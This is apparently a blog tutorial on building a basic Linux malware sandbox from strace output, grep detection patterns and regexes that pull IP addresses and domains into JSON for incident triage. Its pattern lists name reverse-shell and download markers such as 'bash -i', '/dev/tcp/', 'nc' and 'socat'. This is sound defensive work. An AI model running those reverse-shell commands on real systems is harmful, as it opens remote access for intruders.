No Way to Escape: Linux Malware Sandbox Detection Development Fundamental Component from Scratch

Background: Linux malware is a rare example that can be encountered within an environment during its functional process. This presents a real challenge for beginners attempting malware analysis during cybersecurity incidents. In contrast, analyzing malware in a Windows environment is much easier due to the abundance of tools and separate components available for both automatic and manual behavioral analysis. With this, I want to share knowledge how to build your own machine on which incident handlers will be able to obtain the results of analysis when faced with such cases.

Fundamental component: Linux itself includes built-in components such as strace and ptrace, which are used to debug processes. Instead of reinventing the wheel, we can leverage these existing tools for our purposes.

Design: Because we already know what to use as the core of our solution, we need to understand the flow and processes that must be implemented inside our sandbox. First and foremost, it should be able to trace suspicious command executions and C&C (Command and Control) communications. For that reason, we can define some detection patterns:

# Syscall patterns of interest (potentially suspicious activity)
SYSCALLS="setsockopt|connect|execve|system|fork|clone|accept|bind|listen|socket|sendto|recvfrom|sendmsg|recvmsg|ptrace|chmod|chown|unlink|rename|mmap|kill|open|write|read|creat|dup|pipe|mount|umount"

# Persistence and reverse shell related command patterns
PERSISTENCE_CMDS="nc|netcat|bash -i|/bin/bash -i|/dev/tcp/|/dev/udp/|curl|wget|python -c.*socket|perl -e.*socket|socat|crontab|cron|systemd|service|rc\.local|atd|init\.d|bash -c|nohup|disown|tmux|screen|ssh|dropbear|reverse shell|startup|autorun"

The next challenge is to use regular expressions (regex) to extract all IP addresses from ptrace or strace logs.

'([0-9]{1,3}\.){3}[0-9]{1,3}'
'([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}'

And this result we can output as JSON file

Result: Now let's collect our knowledge into 1 place to create the core component of sandbox .


SYSCALLS="setsockopt|connect|execve|system|fork|clone|accept|bind|listen|socket|sendto|recvfrom|sendmsg|recvmsg|ptrace|chmod|chown|unlink|rename|mmap|kill|open|write|read|creat|dup|pipe|mount|umount" PERSISTENCE_CMDS="nc|netcat|bash -i|/bin/bash -i|/dev/tcp/|/dev/udp/|curl|wget|python -c.*socket|perl -e.*socket|socat|crontab|cron|systemd|service|rc\.local|atd|init\.d|bash -c|nohup|disown|tmux|screen|ssh|dropbear|reverse shell|startup|autorun" PATTERNS="$SYSCALLS|$PERSISTENCE_CMDS" strace -e trace=%network,%file -f -o "$OUTFILE" bash -c "$CMD" suspicious_activity=$(grep -E "$PATTERNS" "$OUTFILE" | sort | uniq | sed 's/"/\\"/g' | awk '{print " \"" $0 "\","}') ip_addresses=$(grep -Eo '([0-9]{1,3}\.){3}[0-9]{1,3}' "$OUTFILE" | sort | uniq | awk '{print " \"" $0 "\","}') domains=$(grep -Eo '([a-zA-Z0-9-]+\.)+[a-zA-Z]{2,}' "$OUTFILE" | grep -vE '^([0-9]{1,3}\.){3}[0-9]{1,3}$' | sort | uniq | awk '{print " \"" $0 "\","}') rev_shells=$(grep -Ei "$PERSISTENCE_CMDS" "$OUTFILE" | sort | uniq | sed 's/"/\\"/g' | awk '{print " \"" $0 "\","}')

And here is the result enter image description here

enter image description here

enter image description here

Now you can deploy it into any docker or in any automated implementation to deliver the result to end user . Link to implementation example

https://github.com/lisajan-hash/hell_cerberus

Conclusion: As an incident responder, time is critical, especially during the initial triage of malware incidents. Therefore, implementing custom automation tools or utilizing existing vendor solutions should be a top priority for both the incident response (IR) team and IR management. Automation ensures faster and more efficient analysis, helping to minimize the impact of security incidents.